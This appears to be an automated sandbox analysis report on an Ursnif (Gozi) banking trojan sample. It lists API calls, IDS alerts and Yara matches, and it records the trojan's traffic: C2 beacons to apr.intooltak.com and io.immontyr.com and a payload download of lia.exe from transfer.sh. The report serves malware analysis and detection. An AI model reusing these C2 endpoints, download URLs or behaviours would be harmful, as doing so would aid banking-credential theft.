Code function: 8_2_03F18409 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,

8_2_03F18409

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F1B9D4 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,	8_2_03F1B9D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F0E91D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	8_2_03F0E91D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F22ECF lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	8_2_03F22ECF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_0303E91D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	47_2_0303E91D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_0304B9D4 FindFirstFileW,FindNextFileW,FindClose,FreeLibrary,	47_2_0304B9D4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_03052ECF memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose,	47_2_03052ECF

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49751 -> 185.189.12.123:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49751 -> 185.189.12.123:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49752 -> 185.189.12.123:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49752 -> 185.189.12.123:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49754 -> 185.189.12.123:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49820 -> 185.189.12.123:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49820 -> 185.189.12.123:80

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe

Domain query: io.immontyr.com

Uses nslookup.exe to query domains

Show sources

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com

May check the online IP address of the machine

Show sources

Source: C:\Windows\System32\nslookup.exe	DNS query: name: myip.opendns.com
Source: C:\Windows\System32\nslookup.exe	DNS query: name: myip.opendns.com

Uses ping.exe to check the status of other devices and networks

Show sources

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping localhost -n 5

Source: global traffic

HTTP traffic detected: GET /get/3dvhcv/lia.exe HTTP/1.1Host: transfer.shConnection: Keep-Alive

Source: global traffic	HTTP traffic detected: GET /vlSm5FdhwFmMvT/YOr1y3vmv8eg4Ac3b7Y_2/BxNzh6No2PWjhu_2/Fyyb9C79h8hjmv0/0MJdM07T0vYSwv1YW8/_2F13x6Wl/Lrng4lSkMN3h4WUh3_2B/V0ttocBRKlq9AtXNAro/11M6x_2BaL1Zjx_2BWp4qX/FgWuexW_2FQbO/w_2FMf21/MXsR7_2BkMZgcjp0nVIxUlY/KUQNsPRxFs/f5vu_2BQoVI2fu6H_/2BIGCwdRzvbj/hz_2BIOSiZR/JFogKN88OOAHtb/M_2BNELxC21s15Johd0jZ/ulyOnBSm1PSraDUT/nl6kvDdqLoljmN_/2B2yicis3/ZYLr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
Source: global traffic	HTTP traffic detected: GET /g37w_2FYO/KW18Y37P4Dg_2F1TMh_2/FK2ujRayUy6lspI6qOC/AgWOSVQoUjByibFH6VxOps/v3Ehdrv875bm_/2Bs0w7UO/8HLDir_2FrS7hQvf7_2F_2F/dRVLAAfuPh/m30EKXD6FtreycZoi/lobTM_2FcJdc/YK8geqpXCxP/dDLbqs1jlQyVsA/bp_2Fxijgc04UGfwb6H7A/hHd5lPMnnVOlY1xb/cpTKFIgzAGJyGab/7_2BPVHreJHJUQdZTy/CjJC9x69g/tFYle1uxB8JrgYxIiF_2/BMgOKImH_2BEsdbiTm7/xqsfHc14yTZglOas0gOCoM/8tPVx3GttAeuK/bZvFimTpFp_2B/LS HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
Source: global traffic	HTTP traffic detected: GET /lnhNHa_2Btty8CaNj/2ZI6TN22qvUD/8ZPV4upYsm_/2FN7_2B_2BUcD0/ieoqnU4qUIxSEwBSHp3U9/VTOicK4Dg9CvfDD5/DOzqkKaYmXyqB_2/BBeVS9VS7cZ_2Bxp8N/QUqIP2qoG/d9YX0YxhQ9wrMxFsIM3_/2FpgIEySH_2F7iIla7P/RVB1W1dWGnBa303ekXLbS2/H9XWbOoIqxvpR/Y0oANlOz/wA_2FDoUg6f5pt9sPS8pXWN/S8nUx2g1cV/w178G4jzQvTUGix2J/FRZXUdQwbPuV/iCh6boYFIAo/eBnDiqYSbaisXu/CvhfCnnlGNsLFuBfY6dkH/EJQ5NM_2B10n/nvc8N HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
Source: global traffic	HTTP traffic detected: GET /cG9R2yLu/hwY1VC7UV0FGuTFHUDuWv94/dWPB0qINsS/UcOtH5ibuFGkRtRRz/TcTs3WrbL3kk/KH9_2B01P5_/2BqOCU5VAuO8RX/tDtOsh5JefONIGFgJjwJW/WTNQ_2BigLNUfSTv/vEQOtss42jXAD7m/Vb_2FBrZFcmnzVx4eL/FgvV_2F2J/WJxkKD87XHV59J1BIptx/grHAayUrM6ZXOpWMd4b/m8CaZcQ61hUgT0Er2sN6yR/jqxJkoogaoGBQ/oxZTsR50/IU6qlhp0LlHnTmpxFkzazjn/ZXLdcjlESY/R9eDED1XHAy_2FpXA/QYirrLarjNjS/_2Faftuam8rF_2F/1Ew HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: io.immontyr.com
Source: global traffic	HTTP traffic detected: POST /NmtPFuQd_2/BfdLYLn2BLCtH1Hsh/hg_2FVLDGfIg/gtHnWY07UvK/_2FGfiZdkTNp3n/qSVe2e02NbQuSngndCWZx/FHtx2JyPoVSWyJAF/Nf3MxwobjdKHeJw/QN32g1hXKaTKdLZpGQ/1rai86tHa/cARCkcyc0ZIXwpr6o7hy/9LscnpzGSQw_2BN65St/d5vH28LuyC5fwk6W58_2BJ/mW_2BjaYyboIc/4qfAAbea/H6DnQT_2FBDJuaMwLw_2Bis/Q5vm9_2Bsb/WNMn_2Bg9zRAyx8QD/EwO5ty_2BWJe/AeEgVlXP8KP/mEQSv1dRw/v0fxMe2Myiu1T/e HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Content-Length: 2Host: io.immontyr.com

Source: RegAsm.exe, 00000008.00000003.412693608.0000000000E93000.00000004.00000001.sdmp	String found in binary or memory: http://apr.intooltak.com/lnhNHa_2Btty8CaNj/2ZI6TN22qvUD/8ZPV4upYsm_/2FN7_2B_2BUcD0/ieoqnU4qUIxSEwBSH
Source: RegAsm.exe, 00000008.00000003.457301811.00000000043A8000.00000004.00000040.sdmp, control.exe, 0000001C.00000003.532875532.000001DC0EF2C000.00000004.00000040.sdmp, control.exe, 0000001C.00000003.473440748.000001DC0EF2C000.00000004.00000040.sdmp, control.exe, 0000001C.00000002.544075134.000001DC0EF2C000.00000004.00000040.sdmp, rundll32.exe, 00000024.00000003.541235990.0000020FDF04C000.00000004.00000040.sdmp, rundll32.exe, 00000024.00000002.543904492.0000020FDF04C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000025.00000002.825382176.000001B91FF02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000029.00000002.826395409.00000163C5A02000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txt
Source: RegAsm.exe, 00000008.00000003.457301811.00000000043A8000.00000004.00000040.sdmp, control.exe, 0000001C.00000003.532875532.000001DC0EF2C000.00000004.00000040.sdmp, control.exe, 0000001C.00000003.473440748.000001DC0EF2C000.00000004.00000040.sdmp, control.exe, 0000001C.00000002.544075134.000001DC0EF2C000.00000004.00000040.sdmp, rundll32.exe, 00000024.00000003.541235990.0000020FDF04C000.00000004.00000040.sdmp, rundll32.exe, 00000024.00000002.543904492.0000020FDF04C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000025.00000002.825382176.000001B91FF02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000029.00000002.826395409.00000163C5A02000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: RegAsm.exe, 00000008.00000003.457301811.00000000043A8000.00000004.00000040.sdmp, control.exe, 0000001C.00000003.532875532.000001DC0EF2C000.00000004.00000040.sdmp, control.exe, 0000001C.00000003.473440748.000001DC0EF2C000.00000004.00000040.sdmp, control.exe, 0000001C.00000002.544075134.000001DC0EF2C000.00000004.00000040.sdmp, rundll32.exe, 00000024.00000003.541235990.0000020FDF04C000.00000004.00000040.sdmp, rundll32.exe, 00000024.00000002.543904492.0000020FDF04C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000025.00000002.825382176.000001B91FF02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000029.00000002.826395409.00000163C5A02000.00000004.00000001.sdmp	String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: RuntimeBroker.exe, 00000029.00000000.607858316.00000163C251B000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobe.cmgR
Source: RuntimeBroker.exe, 00000029.00000000.607858316.00000163C251B000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobe.ux2
Source: RuntimeBroker.exe, 00000029.00000000.607858316.00000163C251B000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobp/
Source: RuntimeBroker.exe, 00000029.00000000.607858316.00000163C251B000.00000004.00000001.sdmp	String found in binary or memory: http://ns.micro/1
Source: powershell.exe, 00000016.00000002.586306503.0000020347CCF000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000016.00000002.538900728.0000020337E6A000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: gozi.exe, 00000002.00000002.328014285.00000000031F4000.00000004.00000001.sdmp, powershell.exe, 00000016.00000002.537650333.0000020337C61000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: gozi.exe, 00000002.00000002.328074082.0000000003263000.00000004.00000001.sdmp	String found in binary or memory: http://transfer.sh
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000016.00000002.538900728.0000020337E6A000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: powershell.exe, 00000016.00000002.586306503.0000020347CCF000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000016.00000002.586306503.0000020347CCF000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000016.00000002.586306503.0000020347CCF000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000016.00000002.538900728.0000020337E6A000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000016.00000002.586306503.0000020347CCF000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: gozi.exe, 00000002.00000002.328014285.00000000031F4000.00000004.00000001.sdmp	String found in binary or memory: https://transfer.sh
Source: gozi.exe, 00000002.00000002.328014285.00000000031F4000.00000004.00000001.sdmp	String found in binary or memory: https://transfer.sh/get/3dvhcv/lia.exe
Source: gozi.exe, 00000002.00000002.328014285.00000000031F4000.00000004.00000001.sdmp	String found in binary or memory: https://transfer.sh4jl

Source: unknown

DNS traffic detected: queries for: transfer.sh

Source: global traffic	HTTP traffic detected: GET /get/3dvhcv/lia.exe HTTP/1.1Host: transfer.shConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /vlSm5FdhwFmMvT/YOr1y3vmv8eg4Ac3b7Y_2/BxNzh6No2PWjhu_2/Fyyb9C79h8hjmv0/0MJdM07T0vYSwv1YW8/_2F13x6Wl/Lrng4lSkMN3h4WUh3_2B/V0ttocBRKlq9AtXNAro/11M6x_2BaL1Zjx_2BWp4qX/FgWuexW_2FQbO/w_2FMf21/MXsR7_2BkMZgcjp0nVIxUlY/KUQNsPRxFs/f5vu_2BQoVI2fu6H_/2BIGCwdRzvbj/hz_2BIOSiZR/JFogKN88OOAHtb/M_2BNELxC21s15Johd0jZ/ulyOnBSm1PSraDUT/nl6kvDdqLoljmN_/2B2yicis3/ZYLr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
Source: global traffic	HTTP traffic detected: GET /g37w_2FYO/KW18Y37P4Dg_2F1TMh_2/FK2ujRayUy6lspI6qOC/AgWOSVQoUjByibFH6VxOps/v3Ehdrv875bm_/2Bs0w7UO/8HLDir_2FrS7hQvf7_2F_2F/dRVLAAfuPh/m30EKXD6FtreycZoi/lobTM_2FcJdc/YK8geqpXCxP/dDLbqs1jlQyVsA/bp_2Fxijgc04UGfwb6H7A/hHd5lPMnnVOlY1xb/cpTKFIgzAGJyGab/7_2BPVHreJHJUQdZTy/CjJC9x69g/tFYle1uxB8JrgYxIiF_2/BMgOKImH_2BEsdbiTm7/xqsfHc14yTZglOas0gOCoM/8tPVx3GttAeuK/bZvFimTpFp_2B/LS HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
Source: global traffic	HTTP traffic detected: GET /lnhNHa_2Btty8CaNj/2ZI6TN22qvUD/8ZPV4upYsm_/2FN7_2B_2BUcD0/ieoqnU4qUIxSEwBSHp3U9/VTOicK4Dg9CvfDD5/DOzqkKaYmXyqB_2/BBeVS9VS7cZ_2Bxp8N/QUqIP2qoG/d9YX0YxhQ9wrMxFsIM3_/2FpgIEySH_2F7iIla7P/RVB1W1dWGnBa303ekXLbS2/H9XWbOoIqxvpR/Y0oANlOz/wA_2FDoUg6f5pt9sPS8pXWN/S8nUx2g1cV/w178G4jzQvTUGix2J/FRZXUdQwbPuV/iCh6boYFIAo/eBnDiqYSbaisXu/CvhfCnnlGNsLFuBfY6dkH/EJQ5NM_2B10n/nvc8N HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
Source: global traffic	HTTP traffic detected: GET /cG9R2yLu/hwY1VC7UV0FGuTFHUDuWv94/dWPB0qINsS/UcOtH5ibuFGkRtRRz/TcTs3WrbL3kk/KH9_2B01P5_/2BqOCU5VAuO8RX/tDtOsh5JefONIGFgJjwJW/WTNQ_2BigLNUfSTv/vEQOtss42jXAD7m/Vb_2FBrZFcmnzVx4eL/FgvV_2F2J/WJxkKD87XHV59J1BIptx/grHAayUrM6ZXOpWMd4b/m8CaZcQ61hUgT0Er2sN6yR/jqxJkoogaoGBQ/oxZTsR50/IU6qlhp0LlHnTmpxFkzazjn/ZXLdcjlESY/R9eDED1XHAy_2FpXA/QYirrLarjNjS/_2Faftuam8rF_2F/1Ew HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: io.immontyr.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443

Source: unknown

HTTP traffic detected: POST /NmtPFuQd_2/BfdLYLn2BLCtH1Hsh/hg_2FVLDGfIg/gtHnWY07UvK/_2FGfiZdkTNp3n/qSVe2e02NbQuSngndCWZx/FHtx2JyPoVSWyJAF/Nf3MxwobjdKHeJw/QN32g1hXKaTKdLZpGQ/1rai86tHa/cARCkcyc0ZIXwpr6o7hy/9LscnpzGSQw_2BN65St/d5vH28LuyC5fwk6W58_2BJ/mW_2BjaYyboIc/4qfAAbea/H6DnQT_2FBDJuaMwLw_2Bis/Q5vm9_2Bsb/WNMn_2Bg9zRAyx8QD/EwO5ty_2BWJe/AeEgVlXP8KP/mEQSv1dRw/v0fxMe2Myiu1T/e HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Content-Length: 2Host: io.immontyr.com

Source: unknown

HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49743 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 0000001C.00000003.532875532.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392490032.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.826395409.00000163C5A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672226246.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.671882459.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392591901.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473440748.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.671987567.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392517903.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.541235990.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672047552.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392607938.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.671936053.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473486452.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.540930276.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.457301811.00000000043A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392570642.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672143247.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473394409.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.541170125.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473504593.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.825382176.000001B91FF02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.405030349.000000000320C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392542209.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.395416668.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672170468.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000002.673705435.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.543904492.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5696, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 5676, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4364, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4176, type: MEMORYSTR
Source: Yara match	File source: 8.3.RegAsm.exe.330a4a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.RegAsm.exe.330a4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.RegAsm.exe.33b8f40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.RegAsm.exe.33894a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000024.00000000.539555209.0000020FDEA80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000000.652250920.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.568184534.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.609566601.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.468518313.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.523377381.000000000308F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.563482706.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.615563963.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000000.655957739.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000000.648045274.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.470699283.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.537792307.0000020FDEA80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.572793373.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.398744797.0000000003389000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.472358807.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.535827896.0000020FDEA80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.824135960.00000163C5171000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.819337222.000001EAE4571000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.621795530.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.542236121.0000000000E51000.00000020.00020000.sdmp, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 0000001C.00000003.532875532.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392490032.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.826395409.00000163C5A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672226246.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.671882459.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392591901.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473440748.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.671987567.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392517903.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.541235990.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672047552.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392607938.0000000003408000.00000004.00000040.sdmp, type: MEMORY
